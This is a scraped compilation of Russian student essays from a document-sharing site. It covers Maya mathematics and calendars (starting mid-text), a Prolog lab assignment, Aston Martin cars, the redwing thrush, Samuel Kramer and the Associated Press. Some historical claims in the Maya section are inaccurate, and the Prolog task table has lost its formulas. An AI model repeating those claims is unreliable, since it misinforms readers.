Астрономические наблюдения производились майя с вершин их пирамидальных храмов невооруженным глазом; единственным инструментом, возможно, служили две перекрещенные палки, чтобы фиксировать точку наблюдения. По крайней мере, подобные орудия изображены в рукописях Наттол, Сельдена и Бодли около жрецов, наблюдающих звезды. Кроме того, имелись специальные архитектурные комплексы, предназначенные для определения переломных точек времен года.
Столь значительное значение астрономической науки не стало бы возможным без идеально разработанной системы счета. Майя создали такую систему. Она похожа на ту, что арабы переняли у индийцев и позже передали европейцам, которые лишь тогда смогли отказаться от примитивной римской системы.
Майя превзошли эту систему прежде, чем римляне завоевали Галлию и Иберийский полуостров, и много раньше, чем арабы привезли в Европу десятичную систему счета. Считается, что она была изобретена в Индии в VII в. н.э. и что арабы передали ее европейцам лишь спустя несколько веков. Майя же пользовались своей сходной с десятичной системой по крайней мере с IV в. н.э. – иначе говоря, 1600 лет назад.
Как употребляемая нами десятичная система, так и двадцатиричная майяская основывается на едином принципе, согласно которому знак сам по себе ничего не значит, но в сопровождении с другой цифры становится основой для математического обращения, позволившего совершить все завоевания современных наук. Этот знак – ноль, чье свойство увеличивать сочетающуюся с ним цифру в десятки раз по нашей системе и в двадцать раз по системе майя посредством позиционного перемещения указанной цифры влево в первом случае и кверху во втором делает возможными запись бесконечных множеств и осуществление самых сложных астрономических подсчетов.
В нашей десятичной системе имеются девять цифр и ноль. Майяская состоит лишь из двух – точки и черты – и ноля. Изобретение этого знака в столь отдаленные времена поднимает математический гений майя на поразительные вершины. Это означало величайший прогресс в области абстрактного мышления.
Майя могли производить сложные арифметические вычисления. Еще Ланда отмечал способность майя легко оперировать громадными числами: “Их счет ведется по 5 до 20, по 20 до 100, по 100 до 400 и по 400 до 8000. Этим счетом они широко пользовались для торговли какао. У них есть другой счет, более длинный, который они продолжают до бесконечности, считая 8 тысяч 20 раз, что составляет 160 тысяч, затем, возвращаясь к 20, они умножают 160 тысяч на это число и так продолжают умножать на 20, пока не получат громадной цифры. Они считают на земле или на чем-либо гладком”. В другом месте, говоря о календарном счете, Ланда пишет: “При этих возвращениях и запутанном счете удивительно видеть свободу, с которой те, кто знают [их], считают и разбираются”. В основе майяской арифметики лежала двадцатиричная система счисления, возникшая, очевидно, из осмысления и закрепления суммы числа пальцев на руках и ногах одного человека (неслучайно число 20 в некоторых языках майя носит название hun uinic, winak – букв. “один человек). Аналогично нашим единицам, десяткам, сотням, тысячам, миллионам майя имели девять ступеней счета, из которых каждая последующая равнялась двадцати предыдущим, так что наивысшая из них составляла 25 600 000 000, если считать по десятичной системе.
КАЛЕНДАРНАЯ СИСТЕМА МАЙЯ
Календарная система майя представляет собой своеобразную и значительную главу в истории мировой науки. Во всех майяских системах календаря основной единицей является день, безразлично определялся ли он как отрезок времени или как числовой промежуток, выраженный интервалом между двумя датами. О делениях дня на какие-то части (часы, минуты) у майя мы ничего не знаем; сообщение Ланды о частях дня говорит только о его времени (подобно нашим утру, полдню, вечеру). Вероятно, один день начинался, а другой кончался во всех системах в одно и то же время: предположительно в момент солнечного восхода или заката. Наименования дней и месяцев в различных календарях несколько отличаются друг от друга, а в надписях классического периода расшифрованы пока достаточно предположительно.
Майя умело совмещали два календаля: хааб – солнечный, состоявший из 365 дней, и цолкин – религиозный, из 260 дней. Основой религиозного календаря, более старого, чем солнечный, был период в 260 дней, состоявший из комбинации недельного цикла (13 дней) и месячного (20 дней). Дни первого обозначались цифрами от 1 до 13, а дни второго имели 20 названий. В комбинациях с другими циклами дни месяца также обозначались числами от 0 до 19 (первый день месяца считался нулевым) . 260-дневный период имел распространение во всей Месоамерике и, очевидно, был тем зерном, из которого выросли все остальные календарные системы. Происхождение его неясно; некоторые исследователи связывали его с нормальным периодом беременности, но более правильно, конечно, искать его истоки в сельскохозяйственной деятельности древних обитателей Месоамерики, т.е. считать его простым сельскохозяйственным календарем.
365-дневный годичный цикл был установлен с VI или VII в. в соответствии с решениями ученого Собора в Шочикалько. Посредством сложной системы календарной корреляции, названной позже дополнительной серией, они привели этот год в соответствие с действительной длительностью солнечного года, которая, по современным подсчетам, равна 365, 2422 дня. Этот счет оказался более точным, чем летосчисление с високосным годом, введенное согласно календарной реформе папы Григория XIII спустя 900 или даже 1000 лет, в последней четверти XVI в.
Год солнечной календарной системы состоял из 18 месяцев по 20 дней каждый. На языке майя периоды времени назывались: 20 дней (кинов) – виналь; 18 виналей - тун. Для выравнивания солнечного года добавлялись 5 дней, называвшихся майеб, буквально: «неблагоприятные». Считалось, что в эту пятидневку «умирает год», и потому в эти последние дни древние майя ничего не делали, чтобы не навлечь на себя беду.
Тун не был последней единицей времени в календаре майя. При увеличении в 20 раз начинали формироваться циклы: 20 тунов составляли катун; 20 катунов – бактун; 20 бактунов – пиктун; 20 пиктунов – калабтун; 20 калабтутов – кинчильтун и т.д. В алаутун входили 23 040 000 000 дней.
Комбинация солнечного и религиозного цикла составляла цикл календарного круга из 52 неопределенных лет, или 18 980 дней. Таким образом, дата майя состояла из числа 13-дневной недели, названия дня, числа месяца и названия месяца. Такой способ обозначения фиксировал не только определенный день в году, но и определенный день в 52-летнем цикле, так как однозначное сочетание двух чисел и двух названий могло повториться только через 52 неопределенных года.
Датировка по календарному кругу была распространена у многих народов Месоамерики. Несовершенство такой хронологии ясно: через некоторое время уже трудно определить, к какому календарному кругу относится имеющаяся дата.
Кроме этих основных циклов майя использовали и ряд других, самого разнообразного характера. Среди них можно назвать 9-дневную неделю (очевидно, связанную с эннеадой богов ночи, как у нахуа), цикл в 819 дней, 17-дневную неделю богов земли, цикл планеты Венера со средней продолжительностью 583.48 дней, лунный цикл. Объединяя такие циклы в одну систему с календарным кругом, можно получить значительно большие временные периоды. Так, включение 9-дневной недели образует цикл в 468 лет, а добавив еще обозначение дня в 7-дневном цикле, мы получим круг в 3276 лет.
Все даты, сохранившиеся на стелах, монолитах, кодексах и в сделанных испанцами записях раннеколониального периода, имеют единую точку отсчета. По нашей хронологии, она падает на 3113 г. до н.э., или же, в соответствии с иной системой корреляции, на 3373 г. до н.э. Любопытно заметить, что эти даты близки к первому году еврейского календаря, который приходится на 3761 год до н.э. – год предполагаемого создания Библии.
ЗАКЛЮЧЕНИЕ
Кто такие были майя, как им удалось достичь таких результатов, чем объяснить их внезапное исчезновение – в истории доколумбовских цивилизаций больше вопросов, чем ответов. Поиск истины продолжается, пишутся работы, проводятся археологические раскопки, но таинственность и загадочность майя от этого не меньше. Исследователи и специалисты строят догадки, гипотезы и предположения, сопоставляют и анализируют фактологический материал, часто делают акцент на богатом научном опыте майя, считают их очагом развития более поздних цивилизаций. Но как бы там ни было, мы можем представить лишь фоторобот этой уникальной цивилизации, но никогда не сможем ощутить всей ее полноты, никогда не сможем узнать, какие еще знания скрывали жрецы, никогда не поймем, что видели еще они в голубом сиянии звезд.
СПИСОК ЛИТЕРАТУРЫ
Башилов В. А. древние цивилизации Перу и Боливии. М., 1972 г.
Гуляев В. И. Города – государства майя. М., 1979 г.
Кинжалов Р. В. Культура древних майя 1971 г.
Кинжалов Р. В. Мифологические системы Месоамерики 1970 г.
2 |
https://doc4web.ru/informatika/yazik-programmirovaniya-prolog-.html | Язык программирования Пролог 2 | https://doc4web.ru/uploads/files/175/366e9869b830ab4ea21f169862ddb6c4.docx | files/366e9869b830ab4ea21f169862ddb6c4.docx | Лабораторная работа №1.
Цель работы: Изучить основные конструкции языка программирования Пролог для решения задач вычисления функций в экспертных системах.
Теоретические сведения
Пролог – это один из языков программирования, который широко используется для создания баз знаний и экспертных систем. Фундаментальными свойствами языка Пролог являются:
механизм вывода с поиском и возвратом;
встроенный механизм сопоставления с образцом;
простая и легко изменяемая структура данных;
отсутствие указателей, операторов присваивания и перехода;
естественность рекурсии.
Пролог базируется на сочетании указанных свойств, а удобство его – на естественности его принципов для логических задач, сводящихся к рекурсии.
Программы на Прологе состоит из фактов и правил для получения других фактов и ответов на вопросы. Факты по определению считаются доказанными (истинными).
Конкретному применению логической программы соответствует понятие запроса (цели). Достичь цели – означает показать, что она логически следует из фактов и правил программы. Если вопрос содержит переменные, то система должна найти к тому же конкретные объекты, которые будучи подставленными вместо переменных, обеспечат достижение цели.
В алфавит языка входят следующие символы:
прописные и строчные буквы латинского алфавита (A-Z, a-z); регистр букв программы влияет на работу программы;
цифры (0-9);
спецсимволы: ! @ # $ ( ) & * - + / < > ; , ? . \ _ " '
1.2 Структура программы
Пролог – программа включает в себя следующие разделы:
constants – задаются константы;
domains - имена и структуры объектов, используемых в задаче;
predicates – названия отношений между объектами;
clauses – факты и правила, описывающие эти отношения;
goal – описание цели решения.
Для обозначения логических связок для конъюнкции – and, для дизъюнкции – or, следование обозначаются конструкцией «:-» (двоеточие и минус) или слово if. Комментарии обрамляются комбинациями /*…*/.
Домены
Типы данных в Прологе называют доменами. Домен характеризует множество значений, которые может принимать переменная предиката в ходе выполнения программы. Связывание домена с конкретным аргументом (местом) предиката осуществляется в секции predicates. Сами переменные в объявлении не нуждаются. Домены подразделяются на простые и структурированные, стандартные и нестандартные. К стандартным относятся :-symbol – символьная константа (имя), имеет две формы записи:
последовательность букв, цифр и знаков препинания, которая начинается со строчной буквы;
последовательность символов, заключенная в двойные кавычки (примеры: "apple", "person", "Студент Иванов С.В." ) ;
-string – строка символов (любая последовательность символов, заключенная в двойные кавычки).
-char – отдельный символ между апострофами.
-integer – целое число (в диапазоне –32768 до 32767).
-real – действительное число (пример: -34.567, 0.654, 9.76e+3).
Переменная с именем <<_>> (анонимная) используется, если значение переменной несущественно. В примере book (Author, _, _, _, _) речь идет о всех книгах, написанных некоторым <<переменным>> автором, причем пропущенные названия, издательство, место и год рождения роли не играют.
Объявление новых доменов с исползованием стандартных имеет вид
<имя> = <имя_стандартного_домена>
Примеры объявлений:
domains
a=integer
fax=symbol
r, dup=real
Введение авторских наименований доменов позволяет внести в программу больше семантики и обеспечивает контроль типов значений переменных, поскольку смешивать в ходе выполнения программы переменные формально различных типов (доменов) нельзя. В Прологе допускается использование структуры, состоящей из нескольких простых или сложных объектов, например:
domains
articles=book(title,author)
author=author(init,fam)
title, author, fam=symbol
init=string
1.4 Предикаты
Раздел predicates должен содержать полный перечень предикатов пользователя, применяемых в программе. Описание предиката включает <имя предиката> и <список доменов его аргументов>:
<имя предиката> (<d1>,<d2>,…<dN>), где <d1>,<d2>,…<dN>- имена стандартных доменов, объявленных в разделе domains.
Предикаты используются для представления как данных, так и правил их обработки. Примеры:
Predicates
Add(integer,integer,real)
lk (fr)
Утверждения
В разделе clauses описываются утверждения относительно предикатов. Отрицание предиката pr задаётся в форме not(pr) и допустимо только для правой части правила. Существует два типа утверждений: факты и правила. Факт – это имя предиката с заключённым в скобки списком аргументов. Факты используются для констатации того, что выполнено некоторое отношение между объектами. Обычно они записываются относительно предметных констант Однако в фактах могут использоваться и переменные, что позволяет укрупнять факты, уменьшая их общее число и трудоёмкость их поиска в базе данных.
Например, факт mult(x,0,0) объединяет все факты относительно произведения произвольного числа на нуль.
Правило состоит из головной цели – предиката, за которым следует сперва двоеточие с дефисом (:-), а затем тело правила – предикаты (хвостовые цели) разделённые запятыми или точками с запятой. В конце утверждения ставится точка. Предполагается, что переменные в фактах и головных целях утверждения х связаны ??? всеобщности. Переменные в хвостовых целевых утверждениях связаны кванторами существования, а совокупность хвостовых целей рассматривается как логическое произведение.
Пример интерпретации: правило человек (х):- родитель (X,Y), человек (Y). Читается << Всякий Х сын при условии, что родители Х является Y и объект Y – человек >>. В ходе вычислений вместо переменной может быть подставлен другой объект. В этом случае говорят, что переменная конкретизирована. Область действия переменной ограничивается утверждением, и передавать информацию из одного утверждения в другое через свободные переменные нельзя. В Прологе отсутствуют локальные переменные для сохранения промежуточных результатов, поэтому предикаты Пролога дополняются << аргументами-накопителями>>.
Выражения и стандартные предикаты
В теле правила, помимо объявленных в программе предикатов, могут использоваться стандартные операции сравнения. Стандартные предикаты выполняют различные функции по вводу/выводу различных типов данных, работе с файлами и т.п. Для записи арифметических выражений используются знаки арифметических операций и стандартные функции.
Таблица 1. Стандартные функции
№
Обозначение в математике
Обозначение в Прологе
1
|x|
abs(x)
2
ex
exp(x)
3
sin x
sin(x)
4
cos x
cos(x)
5
tg x
tan(x)
6
arctg x
artan(x)
7
ln x
ln(x)
8
log x
log(x)
9
sqrt(x)
10
xz
exp(z*ln(x))
Предикаты ввода/вывода
Ввод осуществляется с помощью предикатов:
readchar(<имя переменной 1>, < имя переменной 2>, …) – ввод символьных переменных;
readint(<список переменных>) – ввод целочисленных переменных;
readreal(<список переменных>) – ввод вещественных переменных.
Вывод осуществляется предикатом write(<список вывода>)
Предикат nl обеспечивает переход на новую строку.
1.8 Цель
Раздел goal содержит внутренний запрос к программе. Для такого запроса Пролог осуществляет поиск только первого подходящего решения, при этом вывод организуется программистом. Целей может быть несколько: тогда они перечисляются через запятую.
Пример цели:
goal
synonym(brave, x),
write("A synonym for 'brave' is"),nl,
write(" ' ", x," ' "),nl
2. Задание к работе
Вычислить функцию, заданную согласно варианта (см. таблицу 1).
Написать и отладить программу.
:
Таблица 1
Вариант
Вид выражения
Исходные данные
1
2
3
1
x=1,1
2
x=0,5
3
x=1,2
4
x=1,05
5
х=1,1
6
х=1,33
7
х=1,21
8
х=1,08
9
х=3,9
10
х=1,37
11
х=1,05
12
х=1,022
13
x=1,2
x=1,8
x=1,01
x=1,77
X=1
x=1.08
x=1.03
x=1.19
x=1.27
x=1.21
x=1.37
x=1.04
x=1.06
3. Контрольные вопросы
Основные секции Пролог-программы.
Какие стандартные домены имеются в Прологе.
Стандартные предикаты ввода/вывода. Описание и параметры.
Основные стандартные функции.
Алфавит языка Пролог. |
https://doc4web.ru/istoriya/aston-martin.html | Aston Martin | https://doc4web.ru/uploads/files/188/1bbd1193bd7f960247646ddb2cff82a5.docx | files/1bbd1193bd7f960247646ddb2cff82a5.docx | Aston Martin
Как и большинство машин этого класса эта машина рассчитана на 2 взрослых и два детских места. Прекрасная динамика(шестицилиндровый двигатель ранее использовался на Jaguar XJ6). Для DB7 мощность двигателя увеличили до 335 л.с. Первый показ автомобиля - на Женевском салоне в марте 1993года, кабриолет - в Детройте 1996года. Aston Martin DB7 Vantage сделан на базе самого успешного в истории британского автопроизводителя автомобиля - DB7 и очень схож по дизайну с концептом Vantage, дебютировавшем на Международном Северо-Американском Автошоу в 1998 году. Название vantage используется компанией с 1950 года для идентификации высококлассных автомобилей в определенном модельном ряду. Самый первый Aston Martin с 12-ти цилиндровым двигателм разгонялся до 60 миль в час за 5 секунд, а его максимальная скорость составляла 185 миль в час.
Изготовляемый вручную на заводе в Ньюпорте в Англии, DB7 Vantage поступил в продажу осенью 2001 года DB7 Vantage выпускается в двух версиях: Coupe и Volante (кабриолет). Устройства безопасности включают двойные воздушные подушки, антиблокировочная система ABS и регулировка тягового усилия. Под капотом установлен двигатель V12 c рабочим объемом 5,9 л, мощностью 420 л.с. Кроме того Vantage экипирован кожаным салоном Connolly, системой обогрева передних кресел, автоматическими подъемниками стекол, системой кондиционирования, радиоприемником и CD-ченджером. Представленная компанией Aston Martin в конце 70-х четырехдверная Lagonda стала символом восьмидесятых.
Один из консультантов, работавших в то время на Aston Martin, помнит день, когда состоялась презентация Lagonda на автошоу "Earls Court Motorshow". По его словам, это была настоящая сенсация, новость для первых полос газет и журналов. Люди выстраивалиcь в очередь, чтобы заказать четырехдверный седан с динамическими характеристиками, напоминающими купе Aston Martin 4 cam V, c ультра современным дизайном и революционными техническими совершенствами. В то время для Aston Martin это событие имело колоссальное значение. Несомненно, что эта модель Lagonda была самой успешной из когда-либо выпускаемых Астон Мартином "Лагонд".
Спустя десять лет автомобиль был модернизирован: добавили топливный инжектор, тщательно перебрали корпус, сохранив стиль и элегантность, обновили, выполненный в британских традициях, внутрениий интрьер салона. Стоимость ее после изменений составляет около 30,000 Английских Фунтов Стерлингов
Сейчас эта Lagonda представляет собой идеальный вариант для неторопливых поездок на набережную Cote D`Azure или на обед в Carlton, после которого можно отправиться в казино Монте Карло. Bon Voyage. Комфортный и высокомощный автомобиль спортивного стиля классической компоновки с кузовом из легкого сплава, изготовляемым вручную: купе (Coupe Vantage) и кабриолет (Volante), а также супермощная версия купе (Vantage 600) с компрессорным двигателем 608 л.с. (Vмакс. 320 км/ч).
Премьера автомобиля состоялась в октябре 1988. В сентябре 1990 появился кабриолет Volante, в марте 1991 в Женеве был представлен Volante 2+2, а в 1992 на свет появился Vantage, что переводится как "преимущество". Осенью 1998 в Париже был представлен модернизированный Vantage 600. В 1999 году на мировом показе в Женеве была представлена юбилейная модификация модели V8 Vantage Le Mans, созданная в честь 40-летия победы машин этой марки в мировом чемпионате спортивных автомобилей, проходившем в 1959 году в Ле-Мане. Развитое аэродинамическое оборудование, агрессивные "ноздри" воздухозаборников и характерная крышка бензобака придают машине боевой вид. А под капотом скрыт восьмицилиндровый монстр мощностью в 600 л. c. Способный загнать стрелку спидометра за отметку 320 км/час. Выпуск автомобиля был ограничен 40 шт.. По техническим характеристикам Le Mans схожа с V8 Vantage 600. По размерам и по дизайну (главный стилист был Иэн Коллам) V12 Vanquish очень близок к модели Aston Martin DB7. Кузов - двухместный или с посадочной формулой 2+2. В его основе - монокок из алюминиевых профилей и карбоновых панелей. По прочности и жесткости такой кузов сравним с кузовами болидов Формулы-1.
Инженеры из городка Ньюпорт Пэнел, где и расположена фирма, особо гордятся 450- сильным двигателем V12 6.0, который является дальнейшим развитием 420-сильного мотора от купе Aston Martin DB7 Vantage. Переключать передачи в шестиступенчатой механической коробке можно не только рычагом, но и с помощью кнопок на руле - в этом случае на смену передач уходит лишь четверть секунды. Огромный крутящий момент (пик - 556 Нм при 5000 об/мин) передается на задние колеса. Разгон до 100 км/ч занимает 4.7 секунд, а максимальная скорость ограничена 306 км/ч. |
https://doc4web.ru/istoriya/belobrovik.html | Белобровик | https://doc4web.ru/uploads/files/187/646f4b7e569f84ff4b22cc3c5f51627c.docx | files/646f4b7e569f84ff4b22cc3c5f51627c.docx | План
Введение
1 Общий вид
2 Распространение
3 Образ жизни
4 Питание
5 Размножение
6 Вылет из гнезда
7 Перелёты и миграции
8 Пение белобровика
9 Классификация
10 Генетика
Список литературы
Введение
Белобро́вик (Turdus iliacus Linnaeus, 1766; другие русские названия — белобро́вый дрозд, дрозд-белобро́вик, дрозд-оре́ховник) — самый мелкий и один из наиболее обычных на территории бывшего СССР представителей рода дроздов.
1. Общий вид
Длина 22 см, вес редко превышает 60 г. Цвет буровато-зелёный (оливково-бурый) на спине и светлый с тёмными (оливково-бурыми) пятнышками снизу. Бока груди и нижние кроющие перья крыла ржаво-рыжие. Над глазами находится беловато-жёлтая бровь; отсюда — русское название этой птицы. Самка выглядит бледнее самца.
2. Распространение
Обитает в Северной Европе и Азии; гнездится на севере Европы и Азии и на Гималаях, зимой мигрирует в более южные регионы, до Африки.
Ещё в XIX веке белобровик встречался в России крайне редко, его размножение носило неожиданный и бурный характер. Примечателен случай внезапного появления в парке Лесного института под Петербургом большого количества этих птиц в 1901 году. Они поселились в этом месте сразу и уже никогда не покидали территорию парка. Позднее, когда парк стал не столь тих и безлюден, белобровики ежегодно стали селиться здесь и выводить птенцов.
Ныне эту птичку можно встретить и в других местах, в самых различных городах России и бывшего СССР.
3. Образ жизни
Белобровик — птица, не боящаяся холода. Этот вид дроздов рано прилетает и поздно улетает с места гнездования. В общей сложности белобровик пребывает в этих местах около полугода. Начала прилёта птиц зависят также и от погодных условий и могут варьироваться от одной до трёх недель. Как правило, массовые прилёты в места гнездования начинаются в апреле и заканчиваются в начале мая.
В городских парках белобровик селится более сгущенно, а в естественных лесах, где гораздо больше места, рассредоточенно. Эта птица предпочитает берёзовое мелколесье, в котором присутствует небольшая примесь еловой поросли. Белобровик предпочитает светлые места, где много кустарников и есть водоёмы, и избегает тёмных еловых или сосновых лесов. На Карельском перешейке он селится в каменистых местах, где растёт только низкорослая растительность. Можно сказать, что гнездование белобровика очень разнообразно, птица может приспособиться к любым условиям, но всё же густой, заросший лес, тайга, для них является менее предпочтительным для гнездования, чем молодые и светлые леса, или парки.
Белобровик смело осваивает новые территории, оседая на гнездовье сначала единичными особями, потом, образуя мелкие группы, а после, стоит только «первооткрывателям» «одобрить» эти места, сюда налетают птицы этого вида в большом количестве, образуя семьи для вывода птенцов.
4. Питание
Питание белобровиков состоит, в основном, из насекомых, дождевых червей, различных бабочек и гусениц. Дождевых червей, в период выкармливания птенцов, белобровики приносят в клювах не по одному, а целым пучком, который опускается в гнездо, а потом уже распределяется между птенцами. Способ добычи пищи у этих птиц очень схож со способом певчего дрозда и рябинника.
5. Размножение
Белобровики приступают к строительству гнёзд в конце апреля, примерно через неделю после начала строительства откладывается первое яйцо. Если птица селится в готовом гнезде, то яйцекладка ускоряется. Во время выбора гнезда или его строительства птица становится очень осторожной, она делает всё, чтобы гнездо было незаметным.
Для белобровиков характерно размещать гнездо близко к земле. Если только имеется надёжная маскировка и опора, птицы с удовольствием устраивают там гнездовье. Любят они основания различных деревьев, или используют небольшие полусгнившие пни. Крайне редко можно увидеть гнездо белобровика, расположенное на возвышенности, в дуплах деревьев, или на заборах и оградах. Но, если у белобровиков будет выбор — сделать гнездовье на возвышенности, или просто на земле, заросшей травой, то второй вариант для этих птиц будет предпочтительным. Единственным исключением являются парки, которые часто посещаются людьми. В этом случае, белобровики делают гнезда на деревьях, вне достигаемости посетителей парка. Форма гнезда у белобровиков может меняться в зависимости от места гнездования. Если основа прочная, то и гнездо будет более массивным и большим. А если гнездо строится на тонких ветках кустарника, то оно будет лёгким и изящным. Можно увидеть хаотично сделанное гнездо в случае расположения его на земле, и примитивное гнездо в виде ямки, находящееся в глубине трухлявого пня.
Белобровики — птицы довольно неприхотливые, но им нужна скрытость гнезда, поэтому гнёзда, созданные искусственно для привлечения этих птиц, если они находятся в скрытом месте, пользуются спросом и популярностью у многих особей.
При благоприятных погодных условиях очень часто у белобровиков бывают повторные кладки после того, как птенцы первого выводка уже воспитаны и слетают с гнезда. Например, в южной Карелии и во многих европейский странах, таких как Германия, замечено, что количество особей, повторно гнездящихся, меняется каждый год. Дважды откладывают яйца и выводят птенцов не более одной трети белобровиков, а в холодные годы второго выводка может и не быть вообще.
Самка откладывает от 3 до 6 яиц, крайне редко больше 7 или меньше 3. К концу сезона количество яиц в гнёздах уменьшается.
6. Вылет из гнезда
После того, как птенцы покидают гнездо, а происходит это через 10—12 дней после появления на свет, они живут прямо на земле. Они, даже не умея летать, очень подвижны и перемещаются на достаточно большие расстояния от своего жилья. Однако они не теряют друг друга, так как постоянно слышат голос друг друга, а родители направляют действия своих детей, показывая, куда нужно направляться. Как только птенец осваивает способность летать, его подвижность ещё более возрастает, но взлетают они только в том случае, если им грозит опасность.
Петь молодые самцы начинают в возрасте 16—18 дней, назвать это пением ещё трудно, но все эти скрипы и писки являются только началом.
7. Перелёты и миграции
Всё лето белобровики мигрируют, передвигаясь с одного места в другое, к моменту вывода птенцов миграции ослабевают, а к августу—сентябрю начинают перерастать в осенний перелёт. Белобровики активно летают по ночам, готовясь к перелёту. Призывные сигналы носят массовый характер и раздаются в тёмное время суток над лесами, парками и над городом. Летают птицы, как правило, небольшими стайками или поодиночке; благодаря сигналам друг друга, они чётко определяют места кормёжки и слетаются туда довольно большими стаями.
Осенняя миграция носит массовый характер в конце сентября — начале октября. Отдельные особи запаздывают с перелётом и их можно видеть в лесах и городских парках даже в начале ноября. Эти поздние вылеты связаны с хорошим урожаем рябины, когда белобровикам хватает пищи. Отмечены случаи зимовки этих птиц, в этом случае они стараются держаться ближе к жилью человека и к тем местам, где на рябинах осталось много ягод.
На зимовку белобровики улетают, главным образом, на юго-запад Европы, на запад Франции, в Португалию и в Италию. Птицы, окольцованные в России, встречались в Бельгии и даже на острове Корсика.
Если птицы вывелись в одном районе, это совсем не означает, что они будут зимовать вместе. Как правило, они разлетаются на довольно большие расстояния, измеряемые несколькими километрами. Зимовочный ареал очень велик и не ограничивается какой-либо определённой местностью.
8. Пение белобровика
Песня этой птицы достаточно приятна для слуха и наполнена звуками, напоминающими свист, крик и щебет. Среди орнитологов много любителей и ценителей песни этой невзрачной маленькой птички. Если птицу потревожить возле гнезда, то белобровик издаёт тревожные звуки, похожие на резкий выкрик «Кук!». Песня может иметь различные оттенки, это является типичным явлением, свойственным именно этому виду птиц. Если белобровики живут замкнутыми группами, то и песню они перенимают друг у друга, передавая её своим детям, а те, в свою очередь, своим. Унификация пения каждый год подлежит переустановке, по прошествии некоторого времени после прилёта. Чаще начинают пение более старые птицы, которые прилетают первыми, у них пение поставлено с прошлого года и они только вспоминают и улучшают его, а потом к ним подключаются более молодые особи, которые со временем формируют свою собственную видовую песню, перенимая её у старших птиц и тем самым образуют пение, свойственное только для белобровиков данной местности.
В том случае, когда белобровики живут не плотными группами и не могут слышать пение друг друга, песня звучит индивидуально и каждая особь строит свою песню сама. Однако, если группа белобровиков имеет схожий или одинаковый напев, это вовсе не значит, что эта группа включает в себя птиц, связанных родством. Учёными доказано, что молодые дрозды-белобровики крайне редко возвращаются в те места, где они родились. Состав птиц ежегодно обновляется молодыми особями, прилетающими с других мест. Молодые белобровики достаточно быстро перенимают пение у старых птиц, а потом, в свою очередь, передают его следующим поколениям. Тем самым, «местная песня» имеет продолжение и не теряется годами.
Белобровики поют возле гнёзд в местах размножения, пение продолжается до середины июля, в зависимости от местности гнездования. Иногда можно услышать пение птиц осенью, но это бывает крайне редко и не свойственно этому виду птиц.
9. Классификация
Вид подразделён на два подвида:
T. i. coburni
T. i. iliacus
10. Генетика
Молекулярная генетика
Депонированные нуклеотидные последовательности в базе данных EntrezNucleotide, GenBank, NCBI, США: 3 (по состоянию на 6 июня 2007).
Депонированные последовательности белков в базе данных EntrezProtein, GenBank, NCBI, США: 3 (по состоянию на 6 июня 2007).
Список литературы:
Рисунок из книги: Naumann J.F. Naturgeschichte der Vögel Mitteleuropas. — 1905. (Естественная история птиц Средней Европы.)
Источник: http://ru.wikipedia.org/wiki/Белобровик |
https://doc4web.ru/istoricheskie-lichnosti/kramer-samyuel.html | Крамер, Самюэль | https://doc4web.ru/uploads/files/247/ebb84854a482016ccd3b75cfc3399f11.docx | files/ebb84854a482016ccd3b75cfc3399f11.docx | Самуэль Крамер (альтернативное написание Сэмюэл Ной Крамер, укр. Сімха Ной Крамер, англ. Samuel Noah Kramer; 28 сентября 1897 — 26 ноября 1990) — востоковед, один из ведущих шумерологов мира.
Биография
Самуэль Крамер родился 28 сентября 1897 года в городе Жашков (ныне Черкасской области Украины) в религиозной еврейской семье. Мальчик по рождению получил два имени Симха (радость) и Ной (в честь библейского патриарха Ноя). В 1905 году семья Крамеров, спасаясь от черносотенных погромов при царе Николае II, эмигрировала в США. Самуэль Крамер с детства обучался идишу и ивриту, а также библейским сказаниям.
В США Крамер вначале избрал карьеру учителя, окончил Школу педагогики в Филадельфии, но увлёкся философией и литературой. Пробовал писать художественные произведения, но разочаровался в своих литературных способностях. Затем Крамер пытался заняться предпринимательской деятельностью, вновь без удовольствия для себя, и в возрасте тридцати лет увлекся востоковедением. Самуэль Крамер поступил в Восточное отделение университета Пенсильвании, где изучал египтологию и ассириологию. В 1930 году защитил диссертацию по аккадскому глаголу, и, в конце концов, остановился на шумерологии. В том же году участвовал в своих первых раскопках в Ираке. После возвращения с Ближнего Востока в 1932 году участвовал в составлении ассирийского словаря.
Самуэль Крамер стал экспертом по древним шумерским текстам, ему удалось собрать, реклассифицировать и перевести с шумерского языка множество памятников шумерской литературы, иногда буквально обнаруживая мелкие обломки одной и той же глиняной таблички в музеях разных континентов. Самуэль Крамер опубликовал более 250 работ, и до своей смерти считался ведущим шумерологом в мире, у ученого была замечательная научная интуиция, подкрепленная глубокими знаниями. Самуэль Крамер внёс огромный вклад в шумерологию, популяризовал шумерскую литературу, сделав её доступной для массового читателя. Известен его перевод одного из первых в истории законодательных сборников — законов Ур-Намму. Он также детально изучал шумеро-аккадский эпос и отстаивал прогрессивность реформ Уруинимгины.
Самуэль Крамер поддерживал тесные связи с иностранными, в том числе советскими, ассириологами. В 1957 году он посещал СССР, чтобы транслитерировать две шумерские элегии с уникальной глиняной таблички, хранящейся в Пушкинском музее в Москве, и встречался с ведущими советскими востоковедами В. В. Струве, И. М. Дьяконовым и их учениками.
Самуэль Крамер вышел на пенсию в 1968 году, но продолжал активно заниматься исследованием шумерской истории. Он умер в 1990 году в США.
Литература
Афанасьева В. К. Шумеры, шумерологи и шумерология. Сэмюэл Ной Крамер. // История начинается в Шумере, «Наука», Москва, 1991 ISBN 5-02-016729-0
Источник: http://ru.wikipedia.org/wiki/Крамер,_Самюэль |
https://doc4web.ru/istoriya/associated-press.html | Associated press | https://doc4web.ru/uploads/files/199/bda37cde534162b7d3a1c8fef0de7493.docx | files/bda37cde534162b7d3a1c8fef0de7493.docx | 1
“My business is merely to communicate facts. My instructions do not allow me to make any comment upon the facts which I communicate. … I therefore confine myself to what I consider legitimate news.”
Lawrence A. Gobright, in testimony to Congress, 1862
«Мое дело – просто сообщать факты. Мне непозволительно как-либо комментировать те факты, о которых я сообщаю. …поэтому я занимаюсь только тем, что я считаю законными новостями».
Лоренс А. Гобрайт, свидетельство перед Конгрессом, 1862
В мае 1848 года 10 людей, представляющих шесть высоко конкурентоспособных Нью-йоркских газет, встретились, чтобы обсудить ресурсы сбора свежих новостей из Европы. Новости из Старого Света доставлялись кораблями, таким образом, прибывали в Америку они спустя 20 дней после самого события. Газеты в то время соревновались, посылая репортеров в гребных шлюпках, чтобы встретить суда, как только они прибывали в Нью-йоркскую гавань. Конкуренция становилась все более жесткой и дорогой – пришло время для создания новостного кооператива. Он был назван Ассошиэйтед Пресс.
